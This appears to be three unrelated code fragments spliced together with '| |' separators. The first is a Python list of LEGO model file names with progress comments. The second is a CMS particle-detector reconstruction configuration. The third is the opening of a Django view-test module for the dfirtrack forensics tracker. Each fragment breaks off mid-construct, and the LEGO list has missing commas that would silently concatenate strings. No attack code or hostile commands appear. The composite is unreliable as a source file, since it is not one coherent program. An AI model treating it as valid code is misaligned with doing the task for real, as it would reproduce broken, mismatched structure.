'10214-1 - Tower Bridge.mpd:10214 - sub-model d - red double-decker bus.ldr',
# poorly named and model is large, come back if desperate
#'10264 - Corner Garage.mpd'
'1029-1 - Milk Delivery Truck - Tine.mpd:1029 - car.ldr',
'106-1 - UNICEF Van.mpd:106 - car.ldr',
'107-2 - Canada Post Mail Truck.mpd:107-2 - m-1a.ldr',
'107-2 - Canada Post Mail Truck.mpd:107-2 - m-1b.ldr',
'1096-1 - Race Buggy.mpd',
'1097-1 - Res-Q Runner.mpd:1097 - jetski.ldr',
'1180-1 - Space Port Moon Buggy.mpd',
'1462-1 - Galactic Scout.mpd:1462 - spaceship.ldr',
'1472-1 - Holiday Home.mpd:1472 - car 1.ldr',
'1472-1 - Holiday Home.mpd:1472 - car 2.ldr',
'1472-1 - Holiday Home.mpd:1472 - boat.ldr',
'1472-1 - Holiday Home.mpd:1472 - trailer.ldr',
#=============== 2021/2/22 below here ======================
'1477-1 - %7BRed Race Car Number 3%7D.mpd',
'1478-1 - Mobile Satellite Up-Link.mpd',
'1479-1 - 2-Pilot Craft.mpd:1479 - spaceship.ldr',
'1484-1 - Weetabix Town House.mpd:1484 - smallcar.ldr',
'1489-1 - Mobile Car Crane.mpd:1489 - passenger car.ldr',
'1489-1 - Mobile Car Crane.mpd:1489 - car crane.ldr',
'1490-1 - Town Bank.mpd:1490 - car.ldr',
'1496-1 - Rally Car.mpd:1496 - car.ldr',
'1557-1 - Scooter.mpd:1557 - space scooter - scooter.ldr',
'1591 - Danone Truck.mpd',
'1620-1 - Astro Dart.mpd:1620 - spaceship.ldr',
'1621-1 - Lunar MPV Vehicle.mpd:1621 - vehicle.ldr',
'1631-1 - Black Racer.mpd',
'1632-1 - Motor Boat.mpd',
'1633-1 - Loader Tractor.mpd',
'1656-1 - Evacuation Team.mpd:1656 - tractor.ldr',
'1656-1 - Evacuation Team.mpd:1656 - cart.ldr',
'1656-1 - Evacuation Team.mpd:1656 - car.ldr',
'1656-1 - Evacuation Team.mpd:1656 - truck.ldr',
'1656-1 - Evacuation Team.mpd:1656 - trailer.ldr',
'1682-1 - Space Shuttle.mpd:1682 - car.ldr',
'1682-1 - Space Shuttle.mpd:1682 - trailer.ldr',
'1702-1 - Fire Fighter 4 x 4.mpd:1702 - car.ldr',
'1704-1 - Ice Planet Satellite Plough.mpd:1704 - vehicle + container.ldr',
'1713-1 - Shipwrecked Pirate.mpd:1713 - raft.ldr',
'1714-1 - Surveillance Scooter.mpd:1714 - spaceship.ldr',
'1731-1 - Ice Planet Scooter.mpd:1731 - spaceship.ldr',
'1772-1 - Airport Container Truck.mpd:1772 - car.ldr',
'1772-1 - Airport Container Truck.mpd:1772 - container.ldr',
'1773-1 - Airline Main_YbM0Kh4.mpd:1773 - car.ldr',
'1773-1 - Airline Main_YbM0Kh4.mpd:1773 - trailer.ldr',
'1775-1 - Jet.mpd:1775 - airplane.ldr',
'1792-1 - Pleasure Cruiser.mpd:1792 - boat.ldr',
'1793-1 - Space Station Zenon.mpd:1793 - vehicle.ldr',
'1793-1 - Space Station Zenon.mpd:1793 - cockpit.ldr',
'1808-1 - Light Aircraft and _3j8215M.mpd:1808 - airplane.ldr',
'1831-1 - Maersk Line Container Lorry.mpd:1831 - truck.ldr',
'1831-1 - Maersk Line Container Lorry.mpd:1831 - trailer.ldr',
'1831-1 - Maersk Line Container Lorry.mpd:1831 - container.ldr',
'1875-1 - Meteor Monitor.mpd:1875 - spaceship.ldr',
'1887-1 - Scout Patrol Ship.mpd:1887 - spaceship.ldr',
'1896-1 - Trauma Team.mpd:1896 - car 1.ldr',
'1896-1 - Trauma Team.mpd:1896 - helicopter.ldr',
'1896-1 - Trauma Team.mpd:1896 - car 2.ldr',
'1916-1 - Starion Patrol.mpd:1916 - spaceship.ldr',
'1952-1 - Dairy Tanker.mpd:1952 - car.ldr',
'1952-1 - Dairy Tanker.mpd:1952 - trailer.ldr',
'1969-1 - Mini Robot.mpd:1969 - robot.ldr',
'1974-4 - Star Quest.mpd:1974 - vehicle.ldr',
#===================== FINISHED HERE =====================
#3/8/2021 below here
'20006-1 - Clone Turbo Tank - Mini.mpd',
'20009-1 - AT-TE Walker - Mini.mpd',
'20011-1 - Garbage Truck.mpd',
'20014-1 - 4 x 4 Dynamo.mpd',
'20019-1 - Slave I.mpd',
'20021-1 - Bounty Hunter Gunship - Mini.mpd',
'2140-1 - ANWB Roadside Assistance Crew.mpd:2140 - car 1.ldr',
'2140-1 - ANWB Roadside Assistance Crew.mpd:2140 - car 2.ldr',
'2140-1 - ANWB Roadside Assistance Crew.mpd:2140 - car 3.ldr',
'2148-1 - LEGO Truck.mpd:2148 - truck.ldr',
'2149-1 - Color Line Container Lorry.mpd:2149 - truck.ldr',
'2149-1 - Color Line Container Lorry.mpd:2149 - trailer.ldr',
'2149-1 - Color Line Container Lorry.mpd:2149 - container.ldr' # not a vhc
'2150-1 - Train Station.mpd:2150 - luggage car 1.ldr',
'2150-1 - Train Station.mpd:2150 - luggage car 2.ldr',
'2531-1 - Rescue Helicopter and Jeep.mpd:2531 - car.ldr',
'2531-1 - Rescue Helicopter and Jeep.mpd:2531 - helicopter.ldr',
'2541-1 - Adventurers Car.mpd:2541 - car.ldr',
'2542-1 - Adventurers Aeroplane.mpd:2542 - aeroplane.ldr',
# from tiny turbos 3
'30030-1 - Racing Car.mpd',
'30033-1 - Racing Truck.mpd',
'30034-1 - Racing Tow Truck.mpd',
'30035-1 - Racing Car.mpd',
'30036-1 - Buggy Racer.mpd',
# scanning again
'30050-1 - Republic Attack Shuttle - Mini.mpd',
'30051-1 - X-wing Fighter - Mini.mpd',
'30052-1 - AAT - Mini.mpd',
'30053-1 - Republic Attack Cruiser - Mini.mpd',
'30054-1 - AT-ST - Mini.mpd',
'30055-1 - Vulture Droid - Mini.mpd',
'30056 - Star Destroyer.mpd',
'30090-1 - Desert Glider.mpd', # contains minifig
'30091-1 - Desert Rover.mpd', # contains minifig
'3015-1 - Space Police Car.mpd:3015 - spaceship.ldr',
'30161-1 - Batmobile.mpd',
'30181-1 - Helicopter.ldr',
'30190 - Ferrari 150deg Italia.mpd',
'30191-1 - Scuderia Ferrari Truck.mpd',
'30192-1 - Ferrari F40.mpd',
#'30193-1 - 250 GT Berlinetta.mpd', # incomplete
'30194-1 - 458 Italia.mpd',
'30195-1 - FXX.mpd',
'30277 - First Order Star Destroyer.mpd',
#'30283-1 - Off-Road.mpd', # incomplete
'30284-1 - Tractor.mpd',
'30300-1 - The Batman Tumbler.mpd',
'30311-1 - Swamp Police Helicopter.mpd:30311 - helicopter.ldr',
'30312-1 - Demolition Driller.mpd:30312 - driller.ldr',
'30313-1 - Garbage Truck.mpd:30313 - truck.ldr',
'3056-1 - Go-Kart.mpd', # contains minifig
'30572 - Race Car.mpd',
'3063-1 - Heartlake Flying Club.mpd:3063 - plane.ldr' # contains friends mfg
# STOPPED HERE
# tiny turbos continues here
'4096 - Micro Wheels - AB Forklift.mpd',
'4096 - Micro Wheels - AB Loader.mpd',
'4096 - Micro Wheels - AB Truck and Trailer.mpd',
'4096 - Micro Wheels - EB Combine Harvester.mpd',
'4096 - Micro Wheels - EB Crane.mpd',
'4096 - Micro Wheels - | |
rParam = cms.double(0.4),
radiusPU = cms.double(0.5),
src = cms.InputTag("caloTowerForTrk"),
srcPVs = cms.InputTag("firstStepPrimaryVerticesUnsorted"),
useDeterministicSeed = cms.bool(True),
voronoiRfact = cms.double(-0.9)
)
ancientMuonSeed = cms.EDProducer("MuonSeedGenerator",
CSCRecSegmentLabel = cms.InputTag("cscSegments"),
CSC_01 = cms.vdouble(
0.166, 0.0, 0.0, 0.031, 0.0,
0.0
),
CSC_01_1_scale = cms.vdouble(-1.915329, 0.0),
CSC_02 = cms.vdouble(
0.612, -0.207, -0.0, 0.067, -0.001,
0.0
),
CSC_03 = cms.vdouble(
0.787, -0.338, 0.029, 0.101, -0.008,
0.0
),
CSC_12 = cms.vdouble(
-0.161, 0.254, -0.047, 0.042, -0.007,
0.0
),
CSC_12_1_scale = cms.vdouble(-6.434242, 0.0),
CSC_12_2_scale = cms.vdouble(-1.63622, 0.0),
CSC_12_3_scale = cms.vdouble(-1.63622, 0.0),
CSC_13 = cms.vdouble(
0.901, -1.302, 0.533, 0.045, 0.005,
0.0
),
CSC_13_2_scale = cms.vdouble(-6.077936, 0.0),
CSC_13_3_scale = cms.vdouble(-1.701268, 0.0),
CSC_14 = cms.vdouble(
0.606, -0.181, -0.002, 0.111, -0.003,
0.0
),
CSC_14_3_scale = cms.vdouble(-1.969563, 0.0),
CSC_23 = cms.vdouble(
-0.081, 0.113, -0.029, 0.015, 0.008,
0.0
),
CSC_23_1_scale = cms.vdouble(-19.084285, 0.0),
CSC_23_2_scale = cms.vdouble(-6.079917, 0.0),
CSC_24 = cms.vdouble(
0.004, 0.021, -0.002, 0.053, 0.0,
0.0
),
CSC_24_1_scale = cms.vdouble(-6.055701, 0.0),
CSC_34 = cms.vdouble(
0.062, -0.067, 0.019, 0.021, 0.003,
0.0
),
CSC_34_1_scale = cms.vdouble(-11.520507, 0.0),
DTRecSegmentLabel = cms.InputTag("dt4DSegments"),
DT_12 = cms.vdouble(
0.183, 0.054, -0.087, 0.028, 0.002,
0.0
),
DT_12_1_scale = cms.vdouble(-3.692398, 0.0),
DT_12_2_scale = cms.vdouble(-3.518165, 0.0),
DT_13 = cms.vdouble(
0.315, 0.068, -0.127, 0.051, -0.002,
0.0
),
DT_13_1_scale = cms.vdouble(-4.520923, 0.0),
DT_13_2_scale = cms.vdouble(-4.257687, 0.0),
DT_14 = cms.vdouble(
0.359, 0.052, -0.107, 0.072, -0.004,
0.0
),
DT_14_1_scale = cms.vdouble(-5.644816, 0.0),
DT_14_2_scale = cms.vdouble(-4.808546, 0.0),
DT_23 = cms.vdouble(
0.13, 0.023, -0.057, 0.028, 0.004,
0.0
),
DT_23_1_scale = cms.vdouble(-5.320346, 0.0),
DT_23_2_scale = cms.vdouble(-5.117625, 0.0),
DT_24 = cms.vdouble(
0.176, 0.014, -0.051, 0.051, 0.003,
0.0
),
DT_24_1_scale = cms.vdouble(-7.490909, 0.0),
DT_24_2_scale = cms.vdouble(-6.63094, 0.0),
DT_34 = cms.vdouble(
0.044, 0.004, -0.013, 0.029, 0.003,
0.0
),
DT_34_1_scale = cms.vdouble(-13.783765, 0.0),
DT_34_2_scale = cms.vdouble(-11.901897, 0.0),
EnableCSCMeasurement = cms.bool(True),
EnableDTMeasurement = cms.bool(True),
EnableME0Measurement = cms.bool(True),
ME0RecSegmentLabel = cms.InputTag("me0Segments"),
OL_1213 = cms.vdouble(
0.96, -0.737, 0.0, 0.052, 0.0,
0.0
),
OL_1213_0_scale = cms.vdouble(-4.488158, 0.0),
OL_1222 = cms.vdouble(
0.848, -0.591, 0.0, 0.062, 0.0,
0.0
),
OL_1222_0_scale = cms.vdouble(-5.810449, 0.0),
OL_1232 = cms.vdouble(
0.184, 0.0, 0.0, 0.066, 0.0,
0.0
),
OL_1232_0_scale = cms.vdouble(-5.964634, 0.0),
OL_2213 = cms.vdouble(
0.117, 0.0, 0.0, 0.044, 0.0,
0.0
),
OL_2213_0_scale = cms.vdouble(-7.239789, 0.0),
OL_2222 = cms.vdouble(
0.107, 0.0, 0.0, 0.04, 0.0,
0.0
),
OL_2222_0_scale = cms.vdouble(-7.667231, 0.0),
SMB_10 = cms.vdouble(
1.387, -0.038, 0.0, 0.19, 0.0,
0.0
),
SMB_10_0_scale = cms.vdouble(2.448566, 0.0),
SMB_11 = cms.vdouble(
1.247, 0.72, -0.802, 0.229, -0.075,
0.0
),
SMB_11_0_scale = cms.vdouble(2.56363, 0.0),
SMB_12 = cms.vdouble(
2.128, -0.956, 0.0, 0.199, 0.0,
0.0
),
SMB_12_0_scale = cms.vdouble(2.283221, 0.0),
SMB_20 = cms.vdouble(
1.011, -0.052, 0.0, 0.188, 0.0,
0.0
),
SMB_20_0_scale = cms.vdouble(1.486168, 0.0),
SMB_21 = cms.vdouble(
1.043, -0.124, 0.0, 0.183, 0.0,
0.0
),
SMB_21_0_scale = cms.vdouble(1.58384, 0.0),
SMB_22 = cms.vdouble(
1.474, -0.758, 0.0, 0.185, 0.0,
0.0
),
SMB_22_0_scale = cms.vdouble(1.346681, 0.0),
SMB_30 = cms.vdouble(
0.505, -0.022, 0.0, 0.215, 0.0,
0.0
),
SMB_30_0_scale = cms.vdouble(-3.629838, 0.0),
SMB_31 = cms.vdouble(
0.549, -0.145, 0.0, 0.207, 0.0,
0.0
),
SMB_31_0_scale = cms.vdouble(-3.323768, 0.0),
SMB_32 = cms.vdouble(
0.67, -0.327, 0.0, 0.22, 0.0,
0.0
),
SMB_32_0_scale = cms.vdouble(-3.054156, 0.0),
SME_11 = cms.vdouble(
3.295, -1.527, 0.112, 0.378, 0.02,
0.0
),
SME_11_0_scale = cms.vdouble(1.325085, 0.0),
SME_12 = cms.vdouble(
0.102, 0.599, 0.0, 0.38, 0.0,
0.0
),
SME_12_0_scale = cms.vdouble(2.279181, 0.0),
SME_13 = cms.vdouble(
-1.286, 1.711, 0.0, 0.356, 0.0,
0.0
),
SME_13_0_scale = cms.vdouble(0.104905, 0.0),
SME_21 = cms.vdouble(
-0.529, 1.194, -0.358, 0.472, 0.086,
0.0
),
SME_21_0_scale = cms.vdouble(-0.040862, 0.0),
SME_22 = cms.vdouble(
-1.207, 1.491, -0.251, 0.189, 0.243,
0.0
),
SME_22_0_scale = cms.vdouble(-3.457901, 0.0),
SME_31 = cms.vdouble(
-1.594, 1.482, -0.317, 0.487, 0.097,
0.0
),
SME_32 = cms.vdouble(
-0.901, 1.333, -0.47, 0.41, 0.073,
0.0
),
SME_41 = cms.vdouble(
-0.003, 0.005, 0.005, 0.608, 0.076,
0.0
),
SME_42 = cms.vdouble(
-0.003, 0.005, 0.005, 0.608, 0.076,
0.0
),
beamSpotTag = cms.InputTag("offlineBeamSpot"),
crackEtas = cms.vdouble(0.2, 1.6, 1.7),
crackWindow = cms.double(0.04),
deltaEtaCrackSearchWindow = cms.double(0.25),
deltaEtaSearchWindow = cms.double(0.2),
deltaPhiSearchWindow = cms.double(0.25),
scaleDT = cms.bool(True)
)
caloTowerForTrk = cms.EDProducer("CaloTowersCreator",
AllowMissingInputs = cms.bool(False),
EBGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
EBSumThreshold = cms.double(0.2),
EBThreshold = cms.double(0.07),
EBWeight = cms.double(1.0),
EBWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
EEGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
EESumThreshold = cms.double(0.45),
EEThreshold = cms.double(0.3),
EEWeight = cms.double(1.0),
EEWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
EcalRecHitSeveritiesToBeExcluded = cms.vstring(
'kTime',
'kWeird',
'kBad'
),
EcalSeveritiesToBeUsedInBadTowers = cms.vstring(),
EcutTower = cms.double(-1000.0),
HBGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
HBThreshold = cms.double(0.3),
HBThreshold1 = cms.double(0.1),
HBThreshold2 = cms.double(0.2),
HBWeight = cms.double(1.0),
HBWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
HEDGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
HEDThreshold = cms.double(0.2),
HEDThreshold1 = cms.double(0.1),
HEDWeight = cms.double(1.0),
HEDWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
HESGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
HESThreshold = cms.double(0.2),
HESThreshold1 = cms.double(0.1),
HESWeight = cms.double(1.0),
HESWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
HF1Grid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
HF1Threshold = cms.double(0.5),
HF1Weight = cms.double(1.0),
HF1Weights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
HF2Grid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
HF2Threshold = cms.double(0.85),
HF2Weight = cms.double(1.0),
HF2Weights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
HOGrid = cms.vdouble(-1.0, 1.0, 10.0, 100.0, 1000.0),
HOThreshold0 = cms.double(1.1),
HOThresholdMinus1 = cms.double(3.5),
HOThresholdMinus2 = cms.double(3.5),
HOThresholdPlus1 = cms.double(3.5),
HOThresholdPlus2 = cms.double(3.5),
HOWeight = cms.double(1.0),
HOWeights = cms.vdouble(1.0, 1.0, 1.0, 1.0, 1.0),
HcalAcceptSeverityLevel = cms.uint32(9),
HcalAcceptSeverityLevelForRejectedHit = cms.uint32(9999),
HcalPhase = cms.int32(1),
HcalThreshold = cms.double(-1000.0),
MomConstrMethod = cms.int32(1),
MomEBDepth = cms.double(0.3),
MomEEDepth = cms.double(0.0),
MomHBDepth = cms.double(0.2),
MomHEDepth = cms.double(0.4),
UseEcalRecoveredHits = cms.bool(False),
UseEtEBTreshold = cms.bool(False),
UseEtEETreshold = cms.bool(False),
UseHO = cms.bool(True),
UseHcalRecoveredHits = cms.bool(True),
UseRejectedHitsOnly = cms.bool(False),
UseRejectedRecoveredEcalHits = cms.bool(False),
UseRejectedRecoveredHcalHits = cms.bool(True),
UseSymEBTreshold = cms.bool(True),
UseSymEETreshold = cms.bool(True),
ecalInputs = cms.VInputTag(cms.InputTag("ecalRecHit","EcalRecHitsEB"), cms.InputTag("ecalRecHit","EcalRecHitsEE")),
hbheInput = cms.InputTag("hbhereco"),
hfInput = cms.InputTag("hfreco"),
hoInput = cms.InputTag("horeco"),
missingHcalRescaleFactorForEcal = cms.double(0)
)
detachedQuadStep = cms.EDProducer("TrackListMerger",
Epsilon = cms.double(-0.001),
FoundHitBonus = cms.double(5.0),
LostHitPenalty = cms.double(5.0),
MaxNormalizedChisq = cms.double(1000.0),
MinFound = cms.int32(3),
MinPT = cms.double(0.05),
ShareFrac = cms.double(0.19),
TrackProducers = cms.VInputTag(cms.InputTag("detachedQuadStepTracks"), cms.InputTag("detachedQuadStepTracks")),
allowFirstHitShare = cms.bool(True),
copyExtras = cms.untracked.bool(False),
copyMVA = cms.bool(True),
hasSelector = cms.vint32(1, 1),
indivShareFrac = cms.vdouble(0.09, 0.09),
newQuality = cms.string('confirmed'),
selectedTrackQuals = cms.VInputTag(cms.InputTag("detachedQuadStepSelector","detachedQuadStepVtx"), cms.InputTag("detachedQuadStepSelector","detachedQuadStepTrk")),
setsToMerge = cms.VPSet(cms.PSet(
pQual = cms.bool(True),
tLists = cms.vint32(0, 1)
)),
shareFrac = cms.double(0.09),
trackAlgoPriorityOrder = cms.string('trackAlgoPriorityOrder'),
writeOnlyTrkQuals = cms.bool(True)
)
detachedQuadStepClusters = cms.EDProducer("TrackClusterRemoverPhase2",
TrackQuality = cms.string('highPurity'),
maxChi2 = cms.double(9.0),
minNumberOfLayersWithMeasBeforeFiltering = cms.int32(0),
oldClusterRemovalInfo = cms.InputTag("lowPtTripletStepClusters"),
overrideTrkQuals = cms.InputTag("lowPtTripletStepSelector","lowPtTripletStep"),
phase2OTClusters = cms.InputTag("siPhase2Clusters"),
phase2pixelClusters = cms.InputTag("siPixelClusters"),
trackClassifier = cms.InputTag("","QualityMasks"),
trajectories = cms.InputTag("lowPtTripletStepTracks")
)
detachedQuadStepHitDoublets = cms.EDProducer("HitPairEDProducer",
clusterCheck = cms.InputTag("trackerClusterCheck"),
layerPairs = cms.vuint32(0, 1, 2),
maxElement = cms.uint32(50000000),
maxElementTotal = cms.uint32(50000000),
produceIntermediateHitDoublets = cms.bool(True),
produceSeedingHitSets = cms.bool(False),
seedingLayers = cms.InputTag("detachedQuadStepSeedLayers"),
trackingRegions = cms.InputTag("detachedQuadStepTrackingRegions"),
trackingRegionsSeedingLayers = cms.InputTag("")
)
detachedQuadStepHitQuadruplets = cms.EDProducer("CAHitQuadrupletEDProducer",
CAHardPtCut = cms.double(0),
CAPhiCut = cms.double(0),
CAThetaCut = cms.double(0.0011),
SeedComparitorPSet = cms.PSet(
ComponentName = cms.string('none')
),
doublets = cms.InputTag("detachedQuadStepHitDoublets"),
extraHitRPhitolerance = cms.double(0),
fitFastCircle = cms.bool(True),
fitFastCircleChi2Cut = cms.bool(True),
maxChi2 = cms.PSet(
enabled = cms.bool(True),
pt1 = cms.double(0.8),
pt2 = cms.double(2),
value1 = cms.double(500),
value2 = cms.double(100)
),
mightGet = cms.untracked.vstring('IntermediateHitDoublets_detachedQuadStepHitDoublets__RECO'),
useBendingCorrection = cms.bool(True)
)
detachedQuadStepSeedLayers = cms.EDProducer("SeedingLayersEDProducer",
BPix = cms.PSet(
HitProducer = cms.string('siPixelRecHits'),
TTRHBuilder = cms.string('WithTrackAngle'),
skipClusters = cms.InputTag("detachedQuadStepClusters")
),
FPix = cms.PSet(
HitProducer = cms.string('siPixelRecHits'),
TTRHBuilder = cms.string('WithTrackAngle'),
skipClusters = cms.InputTag("detachedQuadStepClusters")
),
MTEC = cms.PSet(
),
MTIB = cms.PSet(
),
MTID = cms.PSet(
),
MTOB = cms.PSet(
),
TEC = cms.PSet(
),
TIB = cms.PSet(
),
TID = cms.PSet(
),
TOB = cms.PSet(
),
layerList = cms.vstring(
'BPix1+BPix2+BPix3+BPix4',
'BPix1+BPix2+BPix3+FPix1_pos',
'BPix1+BPix2+BPix3+FPix1_neg',
'BPix1+BPix2+FPix1_pos+FPix2_pos',
'BPix1+BPix2+FPix1_neg+FPix2_neg',
'BPix1+FPix1_pos+FPix2_pos+FPix3_pos',
'BPix1+FPix1_neg+FPix2_neg+FPix3_neg',
'FPix1_pos+FPix2_pos+FPix3_pos+FPix4_pos',
'FPix1_neg+FPix2_neg+FPix3_neg+FPix4_neg',
'FPix2_pos+FPix3_pos+FPix4_pos+FPix5_pos',
'FPix2_neg+FPix3_neg+FPix4_neg+FPix5_neg',
'FPix3_pos+FPix4_pos+FPix5_pos+FPix6_pos',
'FPix3_neg+FPix4_neg+FPix5_neg+FPix6_neg',
'FPix4_pos+FPix5_pos+FPix6_pos+FPix7_pos',
'FPix4_neg+FPix5_neg+FPix6_neg+FPix7_neg',
'FPix5_pos+FPix6_pos+FPix7_pos+FPix8_pos',
'FPix5_neg+FPix6_neg+FPix7_neg+FPix8_neg'
)
)
detachedQuadStepSeeds = cms.EDProducer("SeedCreatorFromRegionConsecutiveHitsTripletOnlyEDProducer",
MinOneOverPtError = cms.double(1),
OriginTransverseErrorMultiplier = cms.double(1),
SeedComparitorPSet = cms.PSet(
ClusterShapeCacheSrc = cms.InputTag("siPixelClusterShapeCache"),
ClusterShapeHitFilterName = cms.string('ClusterShapeHitFilter'),
ComponentName = cms.string('PixelClusterShapeSeedComparitor'),
FilterAtHelixStage = cms.bool(False),
FilterPixelHits = cms.bool(True),
FilterStripHits = cms.bool(False)
),
SeedMomentumForBOFF = cms.double(5),
TTRHBuilder = cms.string('WithTrackAngle'),
forceKinematicWithRegionDirection = cms.bool(False),
magneticField = cms.string(''),
mightGet = cms.untracked.vstring('RegionsSeedingHitSets_detachedQuadStepHitQuadruplets__RECO'),
propagator = cms.string('PropagatorWithMaterial'),
seedingHitSets = cms.InputTag("detachedQuadStepHitQuadruplets")
)
detachedQuadStepSelector = cms.EDProducer("MultiTrackSelector",
beamspot = cms.InputTag("offlineBeamSpot"),
src = cms.InputTag("detachedQuadStepTracks"),
trackSelectors = cms.VPSet(
cms.PSet(
applyAbsCutsIfNoPV = cms.bool(False),
applyAdaptedPVCuts | |
<filename>dfirtrack_main/tests/system/test_system_views.py
import urllib.parse
from django.contrib.auth.models import User
from django.contrib.messages import get_messages
from django.test import TestCase
from dfirtrack.settings import INSTALLED_APPS as installed_apps
from dfirtrack_artifacts.models import (
Artifact,
Artifactpriority,
Artifactstatus,
Artifacttype,
)
from dfirtrack_config.models import MainConfigModel, Workflow
from dfirtrack_main.models import (
Ip,
System,
Systemstatus,
Task,
Taskname,
Taskpriority,
Taskstatus,
)
class SystemViewTestCase(TestCase):
"""system view tests"""
@classmethod
def setUpTestData(cls):
# create user
test_user = User.objects.create_user(
username='testuser_system', password='<PASSWORD>'
)
# create object
systemstatus_1 = Systemstatus.objects.create(systemstatus_name='systemstatus_1')
# create objects
system_1 = System.objects.create(
system_name='system_1',
systemstatus=systemstatus_1,
system_created_by_user_id=test_user,
system_modified_by_user_id=test_user,
)
system_2 = System.objects.create(
system_name='system_2',
systemstatus=systemstatus_1,
system_created_by_user_id=test_user,
system_modified_by_user_id=test_user,
)
# create object
Workflow.objects.create(
workflow_name='workflow_1',
workflow_created_by_user_id=test_user,
workflow_modified_by_user_id=test_user,
)
# create object
artifactpriority_1 = Artifactpriority.objects.create(
artifactpriority_name='artifactpriority_1'
)
# create objects
artifactstatus_open = Artifactstatus.objects.create(
artifactstatus_name='artifactstatus_open'
)
artifactstatus_closed = Artifactstatus.objects.create(
artifactstatus_name='artifactstatus_closed'
)
# create object
artifacttype_1 = Artifacttype.objects.create(artifacttype_name='artifacttype_1')
# create objects
Artifact.objects.create(
artifact_name='artifact_open_system_1',
artifactpriority=artifactpriority_1,
artifactstatus=artifactstatus_open,
artifacttype=artifacttype_1,
system=system_1,
artifact_created_by_user_id=test_user,
artifact_modified_by_user_id=test_user,
)
Artifact.objects.create(
artifact_name='artifact_closed_system_1',
artifactpriority=artifactpriority_1,
artifactstatus=artifactstatus_closed,
artifacttype=artifacttype_1,
system=system_1,
artifact_created_by_user_id=test_user,
artifact_modified_by_user_id=test_user,
)
Artifact.objects.create(
artifact_name='artifact_open_system_2',
artifactpriority=artifactpriority_1,
artifactstatus=artifactstatus_open,
artifacttype=artifacttype_1,
system=system_2,
artifact_created_by_user_id=test_user,
artifact_modified_by_user_id=test_user,
)
Artifact.objects.create(
artifact_name='artifact_closed_system_2',
artifactpriority=artifactpriority_1,
artifactstatus=artifactstatus_closed,
artifacttype=artifacttype_1,
system=system_2,
artifact_created_by_user_id=test_user,
artifact_modified_by_user_id=test_user,
)
# get config
main_config_model = MainConfigModel.objects.get(main_config_name='MainConfig')
main_config_model.artifactstatus_open.add(artifactstatus_open)
# create objects
taskname_00_blocked_system_1 = Taskname.objects.create(
taskname_name='task_00_blocked_system_1'
)
taskname_10_pending_system_1 = Taskname.objects.create(
taskname_name='task_10_pending_system_1'
)
taskname_20_working_system_1 = Taskname.objects.create(
taskname_name='task_20_working_system_1'
)
taskname_30_done_system_1 = Taskname.objects.create(
taskname_name='task_30_done_system_1'
)
taskname_40_skipped_system_1 = Taskname.objects.create(
taskname_name='task_40_skipped_system_1'
)
taskname_00_blocked_system_2 = Taskname.objects.create(
taskname_name='task_00_blocked_system_2'
)
taskname_10_pending_system_2 = Taskname.objects.create(
taskname_name='task_10_pending_system_2'
)
taskname_20_working_system_2 = Taskname.objects.create(
taskname_name='task_20_working_system_2'
)
taskname_30_done_system_2 = Taskname.objects.create(
taskname_name='task_30_done_system_2'
)
taskname_40_skipped_system_2 = Taskname.objects.create(
taskname_name='task_40_skipped_system_2'
)
taskpriority_1 = Taskpriority.objects.create(taskpriority_name='taskpriority_1')
# get objects
taskstatus_00_blocked = Taskstatus.objects.get(taskstatus_name='00_blocked')
taskstatus_10_pending = Taskstatus.objects.get(taskstatus_name='10_pending')
taskstatus_20_working = Taskstatus.objects.get(taskstatus_name='20_working')
taskstatus_30_done = Taskstatus.objects.get(taskstatus_name='30_done')
taskstatus_40_skipped = Taskstatus.objects.get(taskstatus_name='40_skipped')
# create objects
Task.objects.create(
taskname=taskname_00_blocked_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_00_blocked,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_10_pending_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_10_pending,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_20_working_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_20_working,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_30_done_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_30_done,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_40_skipped_system_1,
taskpriority=taskpriority_1,
taskstatus=taskstatus_40_skipped,
system=system_1,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_00_blocked_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_00_blocked,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_10_pending_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_10_pending,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_20_working_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_20_working,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_30_done_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_30_done,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
Task.objects.create(
taskname=taskname_40_skipped_system_2,
taskpriority=taskpriority_1,
taskstatus=taskstatus_40_skipped,
system=system_2,
task_created_by_user_id=test_user,
task_modified_by_user_id=test_user,
)
def test_system_list_not_logged_in(self):
"""test list view"""
# create url
destination = '/login/?next=' + urllib.parse.quote('/system/', safe='')
# get response
